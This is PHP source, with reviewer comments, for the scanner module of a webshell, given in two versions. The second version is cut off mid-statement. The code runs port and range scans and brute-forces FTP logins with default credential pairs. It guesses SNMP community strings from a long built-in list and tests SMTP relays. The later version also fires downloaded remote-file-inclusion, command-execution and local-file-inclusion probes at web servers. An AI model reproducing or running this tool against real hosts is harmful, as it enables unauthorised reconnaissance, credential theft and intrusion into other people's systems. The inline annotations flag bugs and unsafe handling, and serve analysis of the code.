/**
 * Scanner module of a PHP webshell: dispatches on $_REQUEST to one of three
 * actions — a port scan of one target, a /24-style "security" scan (reverse
 * DNS, open ports, web banner, nikto-database web checks, SMTP relay, SNMP
 * community and FTP credential tests) or directory/subdomain discovery — and,
 * when no action flag is set, prints the HTML forms that drive them.
 *
 * Every parameter is read straight from $_REQUEST; only the numeric ones are
 * cast, nothing else is validated, and several values are reflected into the
 * generated HTML unescaped (flagged inline). Results are echoed as they are
 * found, so output is interleaved with network I/O.
 *
 * Depends on globals $hcwd and $et (form decoration) and on helpers defined
 * elsewhere in the shell: checkthisporT, check_urL, downloadiT, whereistmP,
 * get_sw_namE, checksmtP, snmpchecK, hlinK. Their contracts are not visible
 * here; where a comment below describes one it is inferred from the call site.
 *
 * @return void
 */
function scanneR()
{
    global $hcwd, $et;
    // Default target shown in the forms: this server's own address.
    if (!empty($_SERVER['SERVER_ADDR'])) {
        $host = $_SERVER['SERVER_ADDR'];
    } else {
        $host = '127.0.0.1';
    }
    // Protocol selection for the port scanner (1 = checkbox set).
    $udp = empty($_REQUEST['udp']) ? 0 : 1;
    $tcp = empty($_REQUEST['tcp']) ? 0 : 1;
    // ---- Action 1: port scan of a single target over [fromport, toport]. ----
    // empty() treats "0" as unset, so fromport=0 or timeout=0 silently falls through to the form.
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        $target = $_REQUEST['target']; // raw; escaped in the heading only, not in the telnet:// links below
        $from = (int) $_REQUEST['fromport'];
        $to = (int) $_REQUEST['toport'];
        $timeout = (int) $_REQUEST['timeout'];
        $nu = 0; // running count of open ports, used as the line number
        echo '<font color=blue>Port scanning started against ' . htmlspecialchars($target) . ':<br>';
        $start = time();
        for ($i = $from; $i <= $to; $i++) {
            if ($tcp) {
                // checkthisporT($host, $port, $timeout[, $udp]) — presumably truthy when the port answers.
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = '';
                    // getservbyport() is false for ports without a service name; called twice per hit.
                    if (getservbyport($i, 'tcp')) {
                        $ser = '(' . getservbyport($i, 'tcp') . ')';
                    }
                    // $target is interpolated unescaped into the href attribute.
                    echo "{$nu}) {$i} {$ser} (<a href='telnet://{$target}:{$i}'>Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) {
                // Fourth argument 1 selects the UDP probe.
                if (checkthisporT($target, $i, $timeout, 1)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'udp')) {
                        $ser = '(' . getservbyport($i, 'udp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} [UDP]<br>";
                }
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
    // ---- Action 2: "security" scan of a range: 'from' gives the prefix and first octet, 'to' the last octet. ----
    } elseif (!empty($_REQUEST['securityscanner'])) {
        echo '<font color=blue>';
        $start = time();
        $from = $_REQUEST['from']; // raw, e.g. "10.0.0.1"; never validated as an address
        $to = (int) $_REQUEST['to'];
        $timeout = (int) $_REQUEST['timeout'];
        // $f = text after the last '.', kept as a STRING; $from becomes the prefix before it.
        // If 'from' has no '.', strrpos() returns false and is silently coerced — no guard.
        $f = substr($from, strrpos($from, '.') + 1);
        $from = substr($from, 0, strrpos($from, '.'));
        if (!empty($_REQUEST['httpscanner'])) {
            echo 'Loading webserver bug list...';
            // Nikto 1.36 scan database fetched to a uniquely named temp file; $file is set only on success.
            // downloadiT() is presumed to return truthy on success — inferred from this branch.
            $buglist = whereistmP() . DIRECTORY_SEPARATOR . uniqid('BL');
            $dl = downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
            if ($dl) {
                $file = file($buglist);
                echo 'Done! scanning started.<br><br>';
            } else {
                echo 'Failed!!! scanning started without webserver security testing...<br><br>';
            }
        } else {
            $fr = htmlspecialchars($from);
            echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
        }
        // $f is a string: the loop relies on PHP numeric-string comparison and increment.
        // Non-numeric input is not rejected — TODO confirm behaviour for e.g. 'from=abc'.
        for ($i = $f; $i <= $to; $i++) {
            $output = 0; // set when anything was printed for this host (controls the <hr> below)
            $ip = "{$from}.{$i}";
            if (!empty($_REQUEST['nslookup'])) {
                // gethostbyaddr() returns the input unchanged when there is no PTR record.
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) {
                    echo "{$ip} [{$hn}]<br>";
                }
                $output = 1; // set even when nothing was printed, so every host gets a separator
            }
            if (!empty($_REQUEST['ipscanner'])) {
                $port = $_REQUEST['port'];
                // Comma-separated port list, or a single port. $p persists across iterations;
                // explode() replaces it whole, the single-port case overwrites index 0 only.
                if (strstr($port, ',')) {
                    $p = explode(',', $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = '';
                        // Assignment inside the condition: $ser becomes false (prints as '') for unnamed ports.
                        if ($ser = getservbyport($po, 'tcp')) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "{$ip}) Open ports:{$open}<br>";
                    $output = 1;
                }
            }
            if (!empty($_REQUEST['httpbanner'])) {
                // get_sw_namE() appears to return the server banner, -1 when it could not be read,
                // and something falsy when there is no web server — inferred from the branches below.
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "{$ip}) Webserver software: ";
                    if ($res == -1) {
                        echo 'Unknow';
                    } else {
                        echo $res; // remote-controlled banner text, echoed unescaped
                    }
                    echo '<br>';
                    $output = 1;
                }
            }
            if (!empty($_REQUEST['httpscanner'])) {
                // Only when port 80 answers and the bug list loaded. There is no baseline request first,
                // so a server that answers 200 to any path produces a hit for every database entry.
                if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
                    // Substitution lists for the @ADMINDIRS / @USERS / @NUKE / @CGIDIRS placeholders in the database.
                    $admin = array('/admin/', '/adm/');
                    $users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
                    $nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
                    $cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
                    foreach ($file as $v) {
                        $vuln = array(); // immediately replaced by explode() below
                        $v = trim($v);
                        // Skip blank lines and '#' comments.
                        if (!$v || $v[0] == '#') {
                            continue;
                        }
                        // Each line is a quoted CSV record; rewrite it as '^'-separated fields.
                        // A '"' or '^' inside a field would corrupt the split — no quoting is handled.
                        $v = str_replace('","', '^', $v);
                        $v = str_replace('"', '', $v);
                        $vuln = explode('^', $v);
                        // From the check_urL() argument order used below (url, method, expected status, timeout):
                        // [1] = path, [2] = expected status, [3] = HTTP method, [4] = description. Assumed, not verified.
                        // The chained assignment is redundant — every *ch variable is overwritten before use.
                        $page = $cqich = $nukech = $adminch = $userch = $vuln[1];
                        // Four near-identical expansion loops; they differ only in the placeholder and its list.
                        // $url and $vuln[4] (database text) are echoed unescaped in each.
                        if (strstr($page, '@CGIDIRS')) {
                            foreach ($cgi as $cg) {
                                $cqich = str_replace('@CGIDIRS', $cg, $page);
                                $url = "http://{$ip}{$cqich}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } elseif (strstr($page, '@ADMINDIRS')) {
                            foreach ($admin as $cg) {
                                $adminch = str_replace('@ADMINDIRS', $cg, $page);
                                $url = "http://{$ip}{$adminch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } elseif (strstr($page, '@USERS')) {
                            foreach ($users as $cg) {
                                $userch = str_replace('@USERS', $cg, $page);
                                $url = "http://{$ip}{$userch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } elseif (strstr($page, '@NUKE')) {
                            foreach ($nuke as $cg) {
                                $nukech = str_replace('@NUKE', $cg, $page);
                                $url = "http://{$ip}{$nukech}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } else {
                            // No placeholder: request the path as-is.
                            $url = "http://{$ip}{$page}";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                            }
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = ''; // dead assignment, replaced on the next line
                    // checksmtP() presumably returns 1 when the server relays — inferred from the == 1 test.
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "{$ip}) SMTP relay found.<br>";
                        $output = 1;
                    }
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                // UDP/161 probe first, then one snmpchecK() call per comma-separated community string.
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = '';
                    if (strstr($com, ',')) {
                        $c = explode(',', $com);
                    } else {
                        $c[0] = $com;
                    }
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) {
                            $coms .= " {$v} ";
                        }
                    }
                    if ($coms != '') {
                        echo "{$ip}) SNMP FOUND: {$coms}<br>"; // request-supplied strings echoed unescaped
                        $output = 1;
                    }
                }
            }
            if (!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')) {
                if (checkthisporT($ip, 21, $timeout)) {
                    // 'userpass' is a comma-separated list of user:pass pairs; '[BLANK]' means an empty password.
                    // A pair without ':' yields strpos() === false and a garbled split — not guarded.
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') {
                            $pass = '';
                        }
                        // One connection per pair; ftp_close() is never called, so handles live until the request ends.
                        $ftp = ftp_connect($ip, 21, $timeout);
                        if ($ftp) {
                            if (ftp_login($ftp, $user, $pass)) {
                                $output = 1;
                                // The matched credentials are printed in clear and embedded in the
                                // "Connect" link's query string (useR=/pasS=), so they end up in logs and history.
                                echo "{$ip}) FTP FOUND: ({$user}:{$pass}) System type: " . ftp_systype($ftp) . " (<b><a href='";
                                echo hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT={$ip}&useR={$user}&pasS={$pass}");
                                echo "' target='_blank'>Connect</a></b>)<br>";
                            }
                        }
                    }
                }
            }
            // Visual separator after any host that produced output.
            if ($output) {
                echo '<hr size=1 noshade>';
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
        // Remove the downloaded database; $buglist is set whenever the download was attempted.
        if (!empty($buglist)) {
            unlink($buglist);
        }
    // ---- Action 3: directory or subdomain discovery from a word list. ----
    } elseif (!empty($_REQUEST['directoryscanner'])) {
        // 'dic' is a request-supplied path read with file() — no validation; with allow_url_fopen
        // enabled file() also accepts URL wrappers. A missing file makes $dir false and count() fails.
        $dir = file($_REQUEST['dic']);
        $host = $_REQUEST['host']; // raw; used in URLs and echoed unescaped
        $r = $_REQUEST['r1']; // 1 = directories, 0 = subdomains (radio button)
        echo "<font color=blue><pre>Tahap Scanning Dimulai ...\n";
        for ($i = 0; $i < count($dir); $i++) {
            $d = trim($dir[$i]);
            if ($r) {
                // A directory counts as found only on a 302 response; no timeout is passed here.
                $adr = "http://{$host}/{$d}/";
                if (check_urL($adr, 'GET', '302')) {
                    echo "Directory Found: <a href='{$adr}' target='_blank'>{$adr}</a>\n";
                }
            } else {
                // gethostbyname() returns the name unchanged when it does not resolve.
                $adr = "{$d}.{$host}";
                $ip = gethostbyname($adr);
                if ($ip != $adr) {
                    echo "Subdomain Found: <a href='http://{$adr}' target='_blank'>{$adr}({$ip})</a>\n";
                }
            }
        }
        echo 'Done!</pre></font>';
    // ---- No action: render the three forms. ----
    } else {
        $t = "<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
        // UDP is only offered when the sockets extension is loaded; otherwise TCP is forced via a hidden field.
        $chbox = extension_loaded('sockets') ? "<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
        // $host and $_SERVER['HTTP_HOST'] (a client-supplied header) are inserted into value attributes
        // without htmlspecialchars(). The fixed default lists and field names are a stable fingerprint of this tool.
        echo "<center>{$t}><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>{$chbox}</td><td bgcolor='#808080' align='right'>{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></form>{$et}{$t}><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='" . $_SERVER["HTTP_HOST"] . "' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
        // Drop the last octet so the security-scanner default covers this host's /24.
        $host = substr($host, 0, strrpos($host, "."));
        echo "{$t} name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked 
style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH\$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>{$et}";
    }
}
/**
 * Scanner module of a PHP webshell (later variant): dispatches on $_REQUEST
 * to a port scan of one target, a "security" scan over an arbitrary IP range
 * (reverse DNS, ping, traceroute, TCP/UDP ports, web banner, web checks from
 * downloaded word lists, SMTP relay, SNMP community and FTP credential tests)
 * or directory/subdomain discovery; with no action flag set it prints the
 * HTML forms that drive them.
 *
 * Parameters come straight from $_REQUEST; only the numeric ones are cast and
 * several values are reflected into the generated HTML unescaped (flagged
 * inline). Output is echoed as it is found and pushed with @flush_buffers().
 *
 * Depends on globals $windows (platform switch for shell commands), $hcwd,
 * $Resource_Dir (base URL for the scan databases) and $RFI_URL (substituted
 * for %RFI% in the RFI/RCE/LFI lists), and on helpers defined elsewhere in
 * the shell: checkthisporT, check_urL, downloadiT, whereistmP, get_sw_namE,
 * checksmtP, snmpchecK, ftpchecK, getiT, shelL, flush_buffers, checkfunctioN,
 * hlinK. Their contracts are not visible here; descriptions below are
 * inferred from the call sites and marked as such.
 *
 * @return int|void 0 on an invalid IP range, otherwise nothing
 */
function scanneR()
{
    global $windows, $hcwd, $Resource_Dir, $RFI_URL;
    // Default target shown in the forms: this server's own address.
    if (!empty($_SERVER['SERVER_ADDR'])) {
        $host = $_SERVER['SERVER_ADDR'];
    } else {
        $host = '127.0.0.1';
    }
    // Protocol selection for the port scanner (1 = checkbox set).
    $udp = empty($_REQUEST['udp']) ? 0 : 1;
    $tcp = empty($_REQUEST['tcp']) ? 0 : 1;
    // ---- Action 1: port scan of a single target over [fromport, toport]. ----
    // empty() treats "0" as unset, so fromport=0 or timeout=0 silently falls through to the form.
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        $target = $_REQUEST['target']; // raw; escaped in the heading only, not in the telnet:// links below
        $from = (int) $_REQUEST['fromport'];
        $to = (int) $_REQUEST['toport'];
        $timeout = (int) $_REQUEST['timeout'];
        $nu = 0; // running count of open ports, used as the line number
        echo '<font color=#FA0>Port scanning started against ' . htmlspecialchars($target) . ':<br />';
        $start = time();
        for ($i = $from; $i <= $to; $i++) {
            if ($tcp) {
                // checkthisporT($host, $port, $timeout[, $udp]) — presumably truthy when the port answers.
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = '';
                    // getservbyport() is false for ports without a service name; called twice per hit.
                    if (getservbyport($i, 'tcp')) {
                        $ser = '(' . getservbyport($i, 'tcp') . ')';
                    }
                    // $target is interpolated unescaped into the href attribute.
                    echo "{$nu}) {$i} {$ser} (<a href='telnet://{$target}:{$i}'>Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) {
                // Fourth argument 1 selects the UDP probe.
                if (checkthisporT($target, $i, $timeout, 1)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'udp')) {
                        $ser = '(' . getservbyport($i, 'udp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} [UDP]<br>";
                }
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
    // ---- Action 2: "security" scan of every address from 'from' to 'to' inclusive. ----
    } elseif (!empty($_REQUEST['securityscanner'])) {
        echo '<font color=#FA0><pre>';
        $start = time();
        $from = $_REQUEST['from'];
        $to = $_REQUEST['to'];
        // ip2long() returns false for a malformed address; false > false is not true, so malformed
        // input passes this guard. NOTE(review): confirm what the loop below does in that case.
        $fIP = ip2long($from);
        $tIP = ip2long($to);
        if ($fIP > $tIP) {
            echo 'Invalid range!</pre></font>';
            return 0;
        }
        $timeout = (int) $_REQUEST['timeout'];
        if (!empty($_REQUEST['httpscanner'])) {
            echo 'Loading web-server vulnerability DBs...<br />';
            @flush_buffers(); // presumably pushes buffered output to the client; errors suppressed
            // One word list per category, fetched from $Resource_Dir and cached in the temp dir as <name>.pj.
            // An existing cache file is trusted as-is and never refreshed.
            $DBs = array('Directory', 'Files', 'RFI', 'LFI', 'RCE');
            $file = array();
            foreach ($DBs as $db) {
                $buglist = whereistmP() . DIRECTORY_SEPARATOR . "{$db}.pj";
                $dl = !file_exists($buglist) ? downloadiT($Resource_Dir . "scan_db/{$db}.txt", $buglist) : true;
                if ($dl) {
                    $file[$db] = file($buglist);
                    echo "'{$db}' database Loaded.<br />";
                } else {
                    // The key is left unset; the foreach loops below do not check for that.
                    echo "Can not load '{$db}' database.<br />";
                }
                @flush_buffers();
            }
        }
        $fr = htmlspecialchars($from);
        echo "<br />Scanning {$fr}-{$to}:<br />"; // $to is echoed unescaped (only $from was escaped)
        for ($i = $fIP; $i <= $tIP; $i++) {
            $ip = long2ip($i); // always a canonical dotted quad from here on
            echo "<br /><br />---------------- {$ip} ----------------<br />";
            if (!empty($_REQUEST['nslookup'])) {
                // gethostbyaddr() returns the input unchanged when there is no PTR record.
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) {
                    echo "-- Hostname: {$hn}<br />";
                }
            }
            @flush_buffers();
            if (!empty($_REQUEST['ping'])) {
                echo "-- Ping:<br />";
                // Platform-specific ping via shelL(); $ip is from long2ip() and $timeout is int-cast,
                // so the command arguments are constrained. NOTE(review): Linux -W is seconds while
                // Windows -w is milliseconds, so the same $timeout means different waits — confirm.
                $pres = !$windows ? shelL("ping -c 1 -W {$timeout} {$ip}") : shelL("ping -n 1 -w {$timeout} {$ip}");
                // Output parsed by substring for the Windows / Linux "nothing received" phrasing.
                // A non-responding host skips every remaining check for this address.
                if (strstr($pres, 'Received = 0') || strstr($pres, '0 received')) {
                    echo "Ping timeout!<br />";
                    continue;
                } else {
                    echo '<font color="#E9CFEC">' . $pres . '</font><br />'; // raw command output, unescaped
                }
                @flush_buffers();
            }
            if (!empty($_REQUEST['tracert'])) {
                echo "-- Traceroute:<br />";
                $tres = !$windows ? shelL("traceroute -w {$timeout} {$ip}") : shelL("tracert -w {$timeout} {$ip}");
                echo '<font color="#E9CFEC">' . $tres . '</font><br />'; // raw command output, unescaped
                @flush_buffers();
            }
            if (!empty($_REQUEST['tcppscanner'])) {
                $port = $_REQUEST['port'];
                // Comma-separated port list, or a single port. $p persists across iterations;
                // explode() replaces it whole, the single-port case overwrites index 0 only.
                if (strstr($port, ',')) {
                    $p = explode(',', $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = '';
                        // Assignment inside the condition: $ser becomes false (prints as '') for unnamed ports.
                        if ($ser = getservbyport($po, 'tcp')) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "-- TCP open ports:{$open}<br />";
                    @flush_buffers();
                }
            }
            if (!empty($_REQUEST['udppscanner'])) {
                $port = $_REQUEST['udport'];
                if (strstr($port, ',')) {
                    $p = explode(',', $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout, 1);
                    if ($scan) {
                        $ser = '';
                        // Looks up the TCP service table for a UDP port (the port-scan branch above uses 'udp').
                        if ($ser = getservbyport($po, 'tcp')) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "-- UDP open ports:{$open}<br>";
                    @flush_buffers();
                }
            }
            if (!empty($_REQUEST['httpbanner'])) {
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "-- Webserver software: ";
                    // BUG: the inner test repeats the outer one, so this always prints 'Unknow' and the
                    // else branch is unreachable; the banner in $res is never shown.
                    if ($res) {
                        echo 'Unknow';
                    } else {
                        echo $res;
                    }
                    echo '<br />';
                    @flush_buffers();
                }
            }
            if (!empty($_REQUEST['httpscanner'])) {
                echo "-- Webserver security:<br />";
                // Runs only when port 80 answers, the lists loaded, and a request for a random non-existent
                // path does NOT return 200/301/302/403 — i.e. the server is not a catch-all (false-positive guard).
                // check_urL(url, method, accepted statuses, timeout) is assumed from the argument shape.
                if (checkthisporT($ip, 80, $timeout) && !empty($file) && !check_urL('http://' . $ip . '/' . uniqid('TEST_'), 'GET', '200 301 302 403', $timeout)) {
                    echo "Directory scan:<br />";
                    // Each list entry is appended to http://<ip>/ as-is; $v and $res are echoed unescaped.
                    // A missing list (download failed above) makes $file['Directory'] undefined here.
                    foreach ($file['Directory'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $res = check_urL('http://' . $ip . '/' . $v, 'GET', '200 301 302 403', $timeout);
                        if ($res) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a> ({$res})<br />";
                        }
                    }
                    echo "File scan:<br />";
                    foreach ($file['Files'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $res = check_urL('http://' . $ip . '/' . $v, 'GET', '200 301 302 403', $timeout);
                        if ($res) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a> ({$res})<br />";
                        }
                    }
                    echo "RFI scan:<br />";
                    // %RFI% in each entry is replaced with the global $RFI_URL; a hit is a response body
                    // containing the 'NetJackal' marker. $headers is never assigned in this function —
                    // presumably a by-reference out-parameter of getiT(); confirm.
                    foreach ($file['RFI'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $v = str_replace('%RFI%', $RFI_URL, $v);
                        if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'NetJackal')) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
                        }
                    }
                    echo "RCE scan:<br />";
                    // Same shape as the RFI loop but keyed on 'root:' in the body; this loop alone has no @flush_buffers().
                    foreach ($file['RCE'] as $k => $v) {
                        $v = trim($v);
                        $v = str_replace('%RFI%', $RFI_URL, $v);
                        if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'root:')) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
                        }
                    }
                    echo "LFI scan:<br />";
                    foreach ($file['LFI'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $v = str_replace('%RFI%', $RFI_URL, $v);
                        if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'root:')) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = ''; // dead assignment, replaced on the next line
                    // checksmtP() presumably returns 1 when the server relays — inferred from the == 1 test.
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "-- SMTP relay found.<br />";
                        @flush_buffers();
                    }
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                // UDP/161 probe first, then one snmpchecK() call per comma-separated community string.
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = '';
                    if (strstr($com, ',')) {
                        $c = explode(',', $com);
                    } else {
                        $c[0] = $com;
                    }
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) {
                            $coms .= " {$v} ";
                        }
                    }
                    if ($coms != '') {
                        echo "-- SNMP FOUND: {$coms}<br />"; // request-supplied strings echoed unescaped
                        @flush_buffers();
                    }
                }
            }
            // checkfunctioN() is used here, function_exists() in the form below — inconsistent, presumably equivalent.
            if (!empty($_REQUEST['ftpscanner']) && checkfunctioN('ftp_connect')) {
                if (checkthisporT($ip, 21, $timeout)) {
                    // 'userpass' is a comma-separated list of user:pass pairs; '[BLANK]' means an empty password.
                    // A pair without ':' yields strpos() === false and a garbled split — not guarded.
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') {
                            $pass = '';
                        }
                        if (ftpchecK($ip, $user, $pass, $timeout)) {
                            // The matched credentials are printed in clear and embedded in the
                            // "Connect" link's query string (useR=/pasS=), so they end up in logs and history.
                            echo "-- FTP FOUND: ({$user}:{$pass}) (<b><a href='";
